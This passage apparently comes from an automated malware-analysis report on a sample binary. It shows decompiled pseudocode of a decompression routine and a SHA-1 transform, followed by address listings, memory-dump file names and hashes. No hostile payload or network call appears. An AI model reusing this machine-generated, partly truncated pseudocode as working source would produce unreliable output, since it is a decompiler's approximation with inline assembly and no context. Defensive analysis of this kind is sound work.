													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E001AEA80(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E001A7D76(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E001A7D76(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E0019A4ED(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E001A47DA(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E001A397F(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}

0x001a6ce0
0x001a6ce4
0x001a6cea
0x001a6d13
0x001a6d16
0x001a6d1b
0x001a6d1e
0x001a6d05
0x001a6d05
0x00000000
0x001a6d20
0x001a6d2b
0x001a6d2e
0x001a6d31
0x001a6d35
0x001a6d39
0x001a6d3d
0x001a6d3f
0x001a6d41
0x001a6d41
0x001a6d45
0x001a6d52
0x001a6d52
0x001a6d58
0x001a6d5b
0x001a6d5d
0x001a6d61
0x00000000
0x00000000
0x001a6d63
0x001a6d63
0x001a6d65
0x001a72f0
0x001a72f0
0x001a72f2
0x00000000
0x001a72f3
0x001a6d6b
0x001a6d79
0x001a6d79
0x001a6d7b
0x001a6d8a
0x001a6d8a
0x001a6d90
0x001a763f
0x001a763f
0x00000000
0x001a763f
0x00000000
0x001a6d90
0x001a6d7d
0x001a6d84
0x00000000
0x00000000
0x00000000
0x001a6d84
0x001a6d70
0x001a6d73
0x00000000
0x00000000
0x00000000
0x001a6d96
0x001a6d96
0x001a6da3
0x001a6da8
0x001a6ddc
0x001a6ddc
0x001a6de1
0x001a6de8
0x001a6dee
0x001a6df4
0x001a6df8
0x001a6e32
0x001a6e33
0x001a6e34
0x001a6e36
0x001a6e4f
0x001a6e52
0x001a6e59
0x001a6e5c
0x001a6e5f
0x001a6e68
0x001a6e71
0x001a6e73
0x001a6e76
0x001a6e78
0x001a6e78
0x001a6e7a
0x001a6e82
0x001a6e85
0x001a6e8a
0x001a6e8c
0x001a6ea5
0x001a6eab
0x001a72c7
0x001a72c9
0x001a72fc
0x001a7302
0x001a741e
0x001a741e
0x001a7427
0x001a742a
0x001a742c
0x001a7430
0x001a743f
0x001a743f
0x001a7442
0x001a7447
0x001a744e
0x001a7454
0x001a745a
0x001a7461
0x001a748f
0x001a7490
0x001a7491
0x001a7493
0x001a74af
0x001a74b2
0x001a74b9
0x001a74bc
0x001a74bf
0x001a74cb
0x001a74d7
0x001a74d9
0x001a74df
0x001a74e1
0x001a74e1
0x001a74e3
0x001a74eb
0x001a74eb
0x001a74ee
0x001a74f1
0x001a7502
0x001a7505
0x001a7505
0x001a74f3
0x001a74f3
0x001a74f3
0x001a7507
0x001a750a
0x001a750c
0x001a7511
0x001a7518
0x001a7520
0x001a7522
0x001a7529
0x001a752c
0x001a752c
0x001a752f
0x001a752f
0x001a7532
0x001a753d
0x001a7541
0x001a7546
0x001a7549
0x001a754b
0x001a75ff
0x001a75ff
0x001a7602
0x001a7604
0x00000000
0x00000000
0x001a760a
0x001a7610
0x001a7616
0x001a761b
0x001a761f
0x001a7625
0x001a762e
0x001a7631
0x001a7631
0x001a7631
0x001a7636
0x001a7636
0x001a6e9d
0x001a6e9d
0x00000000
0x001a7551
0x001a7551
0x001a7553
0x00000000
0x00000000
0x001a7559
0x001a755f
0x001a7561
0x001a7567
0x001a756b
0x001a756e
0x001a7572
0x001a75c4
0x001a75c7
0x001a71fb
0x001a71fb
0x001a71fe
0x001a7200
0x001a6d4a
0x001a6d4e
0x001a6d4e
0x001a6d52
0x001a6d52
0x001a6d58
0x001a6d5b
0x001a6d5d
0x001a6d61
0x00000000
0x00000000
0x00000000
0x001a6d61
0x001a6d52
0x001a7209
0x001a720b
0x001a720e
0x001a7211
0x00000000
0x00000000
0x001a721a
0x001a721d
0x001a7220
0x001a7223
0x00000000
0x00000000
0x001a722c
0x001a722f
0x001a7232
0x001a7235
0x00000000
0x00000000
0x001a723e
0x001a7241
0x001a7244
0x001a7247
0x00000000
0x00000000
0x001a7250
0x001a7253
0x001a7256
0x001a7259
0x00000000
0x00000000
0x001a7262
0x001a7265
0x001a7269
0x001a726c
0x001a726f
0x001a7278
0x001a727b
0x001a727b
0x00000000
0x001a726f
0x001a75cf
0x001a75cf
0x001a75d2
0x001a75d6
0x001a75d8
0x001a75dc
0x001a75e1
0x001a75e5
0x001a75e8
0x001a75eb
0x001a75ee
0x001a75f1
0x001a75f5
0x001a75f5
0x001a75f5
0x001a71f7
0x001a71f7
0x00000000
0x001a71f7
0x001a7574
0x001a7577
0x00000000
0x00000000
0x001a757f
0x001a757f
0x001a7582
0x001a7585
0x001a7588
0x001a758d
0x001a7593
0x001a7599
0x001a759f
0x001a75a5
0x001a75ab
0x001a75ae
0x001a75b1
0x001a75b4
0x001a75b7
0x001a75ba
0x001a75ba
0x001a75ba
0x00000000
0x001a75bf
0x001a754b
0x001a749b
0x001a749e
0x001a749e
0x001a74a0
0x00000000
0x00000000
0x001a74a2
0x001a74a3
0x001a74a6
0x001a74a9
0x00000000
0x00000000
0x00000000
0x001a74ab
0x001a74ad
0x00000000
0x001a74ad
0x001a7465
0x001a7468
0x001a7472
0x001a747a
0x001a7480
0x001a7483
0x00000000
0x00000000
0x00000000
0x00000000
0x001a7432
0x001a7432
0x001a7435
0x001a7437
0x001a743a
0x001a743a
0x001a743a
0x00000000
0x001a7432
0x001a7308
0x001a730b
0x001a730f
0x001a7311
0x001a6e27
0x001a6e27
0x00000000
0x001a6e27
0x001a7317
0x001a731a
0x001a731f
0x001a7321
0x001a732b
0x001a7330
0x001a7332
0x001a73e2
0x001a73e2
0x001a73e5
0x001a73e7
0x00000000
0x00000000
0x001a73ed
0x001a73f3
0x001a73f9
0x001a73fe
0x001a7402
0x001a7408
0x001a7411
0x001a7414
0x001a7414
0x001a7414
0x00000000
0x001a7419
0x001a7338
0x001a733a
0x00000000
0x00000000
0x001a7340
0x001a7346
0x001a7348
0x001a734e
0x001a7352
0x001a7355
0x001a7359
0x001a73ab
0x001a73ae
0x00000000
0x00000000
0x001a73b6
0x001a73b6
0x001a73b9
0x001a73bb
0x001a73bf
0x001a73c4
0x001a73c8
0x001a73cb
0x001a73ce
0x001a73d1
0x001a73d4
0x001a73d8
0x001a73d8
0x001a73d8
0x00000000
0x001a73dd
0x001a735b
0x001a735e
0x00000000
0x00000000
0x001a7366
0x001a7366
0x001a7369
0x001a736c
0x001a736f
0x001a7374
0x001a737a
0x001a7380
0x001a7386
0x001a738c
0x001a7392
0x001a7395
0x001a7398
0x001a739b
0x001a739e
0x001a73a1
0x001a73a1
0x001a73a1
0x00000000
0x001a73a6
0x001a72cf
0x001a72d3
0x001a72d8
0x001a72da
0x00000000
0x00000000
0x001a72e3
0x001a72e8
0x001a72ea
0x00000000
0x00000000
0x00000000
0x001a72ea
0x001a6eb1
0x001a6eb7
0x001a6eba
0x001a6ecb
0x001a6ece
0x001a6ece
0x001a6ebc
0x001a6ebc
0x001a6ebc
0x001a6ed0
0x001a6ed3
0x001a6ed5
0x001a6eff
0x001a6ed7
0x001a6ed9
0x001a6ee0
0x001a6ee8
0x001a6eea
0x001a6eec
0x001a6ef4
0x001a6efa
0x001a6efa
0x001a6f04
0x001a6f0b
0x001a6f11
0x001a6f17
0x001a6f1e
0x001a6f4c
0x001a6f4d
0x001a6f4e
0x001a6f50
0x001a6f6c
0x001a6f6f
0x001a6f76
0x001a6f79
0x001a6f7c
0x001a6f88
0x001a6f94
0x001a6f96
0x001a6f9c
0x001a6f9e
0x001a6f9e
0x001a6fa0
0x00000000
0x001a6fa0
0x001a6f58
0x001a6f5b
0x001a6f5b
0x001a6f5d
0x00000000
0x00000000
0x001a6f5f
0x001a6f60
0x001a6f63
0x001a6f66
0x00000000
0x00000000
0x00000000
0x001a6f68
0x001a6f6a
0x00000000
0x001a6f20
0x001a6f22
0x001a6f25
0x001a6f2f
0x001a6f37
0x001a6f3d
0x001a6f40
0x001a6fa8
0x001a6fa8
0x001a6fab
0x001a6fae
0x001a6fbe
0x001a6fc1
0x001a6fc1
0x001a6fb0
0x001a6fb0
0x001a6fb0
0x001a6fc3
0x001a6fc7
0x001a6fca
0x001a6fce
0x001a6fd0
0x001a6fd4
0x001a6fd6
0x001a7107
0x001a7107
0x001a710d
0x001a710f
0x001a7110
0x001a7116
0x001a7118
0x001a7119
0x001a711f
0x001a7121
0x001a7121
0x001a7121
0x001a711f
0x001a7116
0x001a7125
0x001a712b
0x001a7131
0x001a7134
0x001a7137
0x001a7142
0x001a7144
0x001a7149
0x001a714c
0x001a7150
0x001a7152
0x001a7283
0x001a7283
0x001a7287
0x001a728a
0x001a728c
0x00000000
0x00000000
0x001a7292
0x001a7298
0x001a729c
0x001a72a2
0x001a72a7
0x001a72ab
0x001a72b1
0x001a72ba
0x001a72bd
0x001a72bd
0x001a72bd
0x00000000
0x001a7158
0x001a7158
0x001a715a
0x00000000
0x00000000
0x001a7160
0x001a7166
0x001a7169
0x001a716f
0x001a7173
0x001a7176
0x001a717a
0x001a71c5
0x001a71c8
0x00000000
0x00000000
0x001a71cc
0x001a71cc
0x001a71cf
0x001a71d3
0x001a71d5
0x001a71d9
0x001a71de
0x001a71e2
0x001a71e5
0x001a71e8
0x001a71eb
0x001a71ee
0x001a71f2
0x001a71f2
0x001a71f2
0x00000000
0x001a71d5
0x001a717c
0x001a717f
0x00000000
0x00000000
0x001a7183
0x001a7183
0x001a7186
0x001a7189
0x001a718c
0x001a7191
0x001a7197
0x001a719d
0x001a71a3
0x001a71a9
0x001a71af
0x001a71b2
0x001a71b5
0x001a71b8
0x001a71bb
0x001a71be
0x001a71be
0x001a71be
0x00000000
0x001a71c3
0x001a6fdc
0x001a6fdc
0x001a6fdf
0x001a70da
0x001a70e3
0x001a70ed
0x001a70f1
0x001a70fa
0x001a70fd
0x001a70fd
0x001a7100
0x001a7103
0x001a7103
0x00000000
0x001a7103
0x001a6fe5
0x001a701b
0x001a6fe7
0x001a6fea
0x001a6fef
0x001a6ff7
0x001a6fff
0x001a7002
0x001a700a
0x001a7011
0x001a7016
0x001a7016
0x001a7020
0x001a7027
0x001a702d
0x001a7033
0x001a703a
0x001a7068
0x001a7069
0x001a706a
0x001a706e
0x001a7070
0x001a708e
0x001a7091
0x001a709d
0x001a70a0
0x001a70a4
0x001a70a9
0x001a70bc
0x001a70be
0x001a70c4
0x001a70c6
0x001a70c6
0x001a70c8
0x00000000
0x001a70c8
0x001a7078
0x001a707b
0x001a707b
0x001a707d
0x00000000
0x00000000
0x001a707f
0x001a7080
0x001a7083
0x001a7086
0x00000000
0x00000000
0x00000000
0x001a7088
0x001a708a
0x00000000
0x001a703c
0x001a703e
0x001a7041
0x001a704b
0x001a7053
0x001a7059
0x001a705c
0x001a70d0
0x001a70d3
0x00000000
0x001a70d3
0x001a703a
0x001a6fd6
0x001a6f1e
0x001a6e97
0x001a6e9a
0x001a6e9a
0x001a6e9a
0x00000000
0x001a6e9a
0x001a6e3b
0x001a6e3e
0x001a6e3e
0x001a6e40
0x00000000
0x00000000
0x001a6e42
0x001a6e43
0x001a6e46
0x001a6e49
0x00000000
0x00000000
0x00000000
0x001a6e4b
0x001a6e4d
0x00000000
0x001a6e4d
0x001a6dfc
0x001a6dff
0x001a6e09
0x001a6e11
0x001a6e17
0x001a6e1a
0x001a6e1d
0x00000000
0x001a6e1d
0x001a6daa
0x001a6dad
0x00000000
0x00000000
0x001a6db1
0x001a6dbc
0x001a6dc2
0x001a764b
0x001a764b
0x00000000
0x001a764b
0x001a6dc8
0x00000000
0x00000000
0x001a6dd0
0x001a6dd6
0x00000000
0x00000000
0x00000000
0x001a6dd6
0x001a6d52
0x001a6d1e
0x001a6cef
0x001a6cf3
0x001a6cf7
0x001a6cfb
0x001a6d03
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
Instruction ID: 0cbb69aeb1649223fe2dfd9df6a3debd61e386085c0a6c641cb8d9825fe22799
Opcode Fuzzy Hash: 807f214746869600fdd18866b4149cd4aafbd92bc6957c1dafb80c3f5aedf6e6
Instruction Fuzzy Hash: 956207796087869FC719CF28C8905B9FBE1FF56304F18866ED9968B782D330EA55CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0019E973, Relevance: .7, Instructions: 694
COMMONCrypto

Download Yara Rule

C-Code - Quality: 70%

			E0019E973(signed int* _a4, signed int _a8, signed int _a12, signed int _a16) {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int* _v20;
				signed int _v24;
				signed int _v28;
				signed int _t429;
				intOrPtr _t431;
				intOrPtr _t436;
				void* _t441;
				intOrPtr _t443;
				signed int _t446;
				void* _t448;
				signed int _t454;
				signed int _t460;
				signed int _t466;
				signed int _t474;
				signed int _t482;
				signed int _t489;
				signed int _t512;
				signed int _t519;
				signed int _t526;
				signed int _t546;
				signed int _t555;
				signed int _t564;
				signed int* _t592;
				signed int _t593;
				signed int _t595;
				signed int _t596;
				signed int* _t597;
				signed int _t598;
				signed int _t599;
				signed int _t601;
				signed int _t603;
				signed int _t604;
				signed int* _t605;
				signed int _t606;
				signed int* _t670;
				signed int* _t741;
				signed int _t752;
				signed int _t769;
				signed int _t773;
				signed int _t777;
				signed int _t781;
				signed int _t782;
				signed int _t786;
				signed int _t787;
				signed int _t791;
				signed int _t796;
				signed int _t800;
				signed int _t804;
				signed int _t806;
				signed int _t809;
				signed int _t810;
				signed int* _t811;
				signed int _t814;
				signed int _t815;
				signed int _t816;
				signed int _t820;
				signed int _t821;
				signed int _t825;
				signed int _t830;
				signed int _t834;
				signed int _t838;
				signed int* _t839;
				signed int _t841;
				signed int _t842;
				signed int _t844;
				signed int _t845;
				signed int _t847;
				signed int* _t848;
				signed int _t851;
				signed int* _t854;
				signed int _t855;
				signed int _t857;
				signed int _t858;
				signed int _t862;
				signed int _t863;
				signed int _t867;
				signed int _t871;
				signed int _t875;
				signed int _t879;
				signed int _t880;
				signed int* _t881;
				signed int _t882;
				signed int _t884;
				signed int _t885;
				signed int _t886;
				signed int _t887;
				signed int _t888;
				signed int _t890;
				signed int _t891;
				signed int _t893;
				signed int _t894;
				signed int _t896;
				signed int _t897;
				signed int* _t898;
				signed int _t899;
				signed int _t901;
				signed int _t902;
				signed int _t904;
				signed int _t905;

				_t906 =  &_v28;
				if(_a16 == 0) {
					_t839 = _a8;
					_v20 = _t839;
					E001AEA80(_t839, _a12, 0x40);
					_t906 =  &(( &_v28)[3]);
				} else {
					_t839 = _a12;
					_v20 = _t839;
				}
				_t848 = _a4;
				_t593 =  *_t848;
				_t886 = _t848[1];
				_a12 = _t848[2];
				_a16 = _t848[3];
				_v24 = 0;
				_t429 = E001B5604( *_t839);
				asm("rol edx, 0x5");
				 *_t839 = _t429;
				_t851 = _t848[4] + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t429;
				_t430 = _t839;
				asm("ror ebp, 0x2");
				_v16 = _t839;
				_a8 =  &(_t839[3]);
				do {
					_t431 = E001B5604(_t430[1]);
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_v16 + 4)) = _t431;
					asm("ror ebx, 0x2");
					_a16 = _a16 + 0x5a827999 + ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t431;
					_t436 = E001B5604( *((intOrPtr*)(_a8 - 4)));
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 - 4)) = _t436;
					asm("ror esi, 0x2");
					_a12 = _a12 + 0x5a827999 + ((_t886 ^ _t593) & _t851 ^ _t886) + _a16 + _t436;
					_t441 = E001B5604( *_a8);
					asm("rol edx, 0x5");
					 *_a8 = _t441;
					asm("ror dword [esp+0x48], 0x2");
					_t886 = _t886 + ((_t851 ^ _t593) & _a16 ^ _t593) + _a12 + 0x5a827999 + _t441;
					_t443 = E001B5604( *((intOrPtr*)(_a8 + 4)));
					_a8 = _a8 + 0x14;
					asm("rol edx, 0x5");
					 *((intOrPtr*)(_a8 + 4)) = _t443;
					_t446 = _v24 + 5;
					asm("ror dword [esp+0x48], 0x2");
					_v24 = _t446;
					_t593 = _t593 + ((_t851 ^ _a16) & _a12 ^ _t851) + _t886 + _t443 + 0x5a827999;
					_v16 =  &(_t839[_t446]);
					_t448 = E001B5604(_t839[_t446]);
					_t906 =  &(_t906[5]);
					asm("rol edx, 0x5");
					 *_v16 = _t448;
					_t430 = _v16;
					asm("ror ebp, 0x2");
					_t851 = _t851 + 0x5a827999 + ((_a16 ^ _a12) & _t886 ^ _a16) + _t593 + _t448;
				} while (_v24 != 0xf);
				_t769 = _t839[0xd] ^ _t839[8] ^ _t839[2] ^  *_t839;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				 *_t839 = _t769;
				_t454 = ((_a12 ^ _t886) & _t593 ^ _a12) + _t851 + _t769 + _a16 + 0x5a827999;
				_t773 = _t839[0xe] ^ _t839[9] ^ _t839[3] ^ _t839[1];
				_a16 = _t454;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				asm("ror ebx, 0x2");
				_t839[1] = _t773;
				_t777 = _t839[0xf] ^ _t839[0xa] ^ _t839[4] ^ _t839[2];
				_t460 = ((_t886 ^ _t593) & _t851 ^ _t886) + _t454 + _t773 + _a12 + 0x5a827999;
				asm("ror esi, 0x2");
				_a8 = _t460;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[2] = _t777;
				_t466 = ((_t851 ^ _t593) & _a16 ^ _t593) + _t460 + 0x5a827999 + _t777 + _t886;
				_t887 = _a16;
				_t781 = _t839[0xb] ^ _t839[5] ^ _t839[3] ^  *_t839;
				_v28 = _t466;
				asm("ror ebp, 0x2");
				_a16 = _t887;
				_t888 = _a8;
				asm("rol edx, 1");
				asm("rol ecx, 0x5");
				_t839[3] = _t781;
				asm("ror ebp, 0x2");
				_t782 = 0x11;
				_a12 = ((_t851 ^ _t887) & _t888 ^ _t851) + 0x5a827999 + _t466 + _t781 + _t593;
				_a8 = _t888;
				_v16 = _t782;
				do {
					_t89 = _t782 + 5; // 0x16
					_t474 = _t89;
					_v8 = _t474;
					_t91 = _t782 - 5; // 0xc
					_t92 = _t782 + 3; // 0x14
					_t890 = _t92 & 0x0000000f;
					_t595 = _t474 & 0x0000000f;
					_v12 = _t890;
					_t786 = _t839[_t91 & 0x0000000f] ^ _t839[_t782 & 0x0000000f] ^ _t839[_t595] ^ _t839[_t890];
					asm("rol edx, 1");
					_t839[_t890] = _t786;
					_t891 = _v28;
					asm("rol ecx, 0x5");
					asm("ror ebp, 0x2");
					_v28 = _t891;
					_t482 = _v16;
					_v24 = _t851 + (_a16 ^ _a8 ^ _t891) + 0x6ed9eba1 + _a12 + _t786;
					_t854 = _v20;
					_t787 = 0xf;
					_t841 = _t482 + 0x00000006 & _t787;
					_t893 = _t482 + 0x00000004 & _t787;
					_t791 =  *(_t854 + (_t482 - 0x00000004 & _t787) * 4) ^  *(_t854 + (_t482 + 0x00000001 & _t787) * 4) ^  *(_t854 + _t893 * 4) ^  *(_t854 + _t841 * 4);
					asm("rol edx, 1");
					 *(_t854 + _t893 * 4) = _t791;
					_t855 = _a12;
					asm("rol ecx, 0x5");
					asm("ror esi, 0x2");
					_a12 = _t855;
					_t489 = _v16;
					_a16 = _a16 + 0x6ed9eba1 + (_a8 ^ _v28 ^ _t855) + _v24 + _t791;
					_t857 = _t489 + 0x00000007 & 0x0000000f;
					_t670 = _v20;
					_t796 = _v20[_t489 - 0x00000003 & 0x0000000f] ^  *(_t670 + (_t489 + 0x00000002 & 0x0000000f) * 4) ^  *(_t670 + _t595 * 4) ^  *(_t670 + _t857 * 4);
					asm("rol edx, 1");
					 *(_t670 + _t595 * 4) = _t796;
					_t596 = _v24;
					asm("rol ecx, 0x5");
					asm("ror ebx, 0x2");
					_v24 = _t596;
					_t597 = _v20;
					_a8 = _a8 + 0x6ed9eba1 + (_t596 ^ _v28 ^ _a12) + _a16 + _t796;
					asm("rol ecx, 0x5");
					_t800 =  *(_t597 + (_v16 - 0x00000008 & 0x0000000f) * 4) ^  *(_t597 + (_v16 + 0xfffffffe & 0x0000000f) * 4) ^  *(_t597 + _t841 * 4) ^  *(_t597 + _v12 * 4);
					asm("rol edx, 1");
					 *(_t597 + _t841 * 4) = _t800;
					_t598 = _a16;
					_t839 = _v20;
					asm("ror ebx, 0x2");
					_a16 = _t598;
					_v28 = _v28 + 0x6ed9eba1 + (_v24 ^ _t598 ^ _a12) + _a8 + _t800;
					_t804 = _t839[_v16 - 0x00000007 & 0x0000000f] ^ _t839[_v16 - 0x00000001 & 0x0000000f] ^ _t839[_t893] ^ _t839[_t857];
					_t894 = _a8;
					asm("rol edx, 1");
					_t839[_t857] = _t804;
					_t851 = _v24;
					asm("rol ecx, 0x5");
					_t782 = _v8;
					asm("ror ebp, 0x2");
					_a8 = _t894;
